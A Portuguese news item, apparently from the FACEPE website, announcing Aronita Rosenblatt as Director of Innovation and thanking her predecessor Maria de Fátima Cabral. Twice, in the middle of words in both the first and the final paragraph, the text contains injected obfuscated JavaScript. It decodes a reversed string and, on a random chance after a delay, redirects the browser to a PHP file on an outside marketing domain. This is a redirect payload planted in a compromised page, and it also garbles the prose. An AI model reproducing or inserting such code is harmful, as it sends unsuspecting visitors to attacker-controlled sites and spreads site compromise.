Aronita Rosenblatt assume como Diretora de Inovação da FACEPE

ARONITAGraduada em Odontologia pela Universidade Federal de Pernambuco, Mestrado na Universidade de Manchester, UK, doutorado s$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anduíche na UCL/Londres e Universidade de Pernambuco (1995).

Atualmente é professora titular da Universidade de Pernambuco, senior clinical investigator - Forsyth Institute, professor visitante - Harvard School of Dental Medicine CHB e gerente geral de politicas de ensino superior - e pesquisa da Secretaria de Ciência e Tecnologia de Pernambuco. Também é membro permanente do programa de Odontologia da FOP-UPE.

A Profa. Aronita acumulará, na FACEPE, as áreas de inovação e assuntos internacionais.

Maria de Fátima Cabral, a última Diretora de Inovação, foi funcionária da FACEPE desde 1988 onde desempenhou as funções de Gerente de Desenvolvimento Científico além da Diretora de Inovação, tendo assumido a responsabilidade por essa diretoria desde seu início. Implantou importantes programas para a estruturação das ações da área, auxili$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando na consolidação dos Habitats de Inovação do estado como Parques Tecnológicos, Incubadoras de Empresas, parcerias público-privado e apoio a pequenas e médias empresas e startups. Sua dedicação permitiu consolidar essa área na instituição. Muito agradecemos sua colaboração e ensejamos muito sucesso em sua nova empreitada além-mar.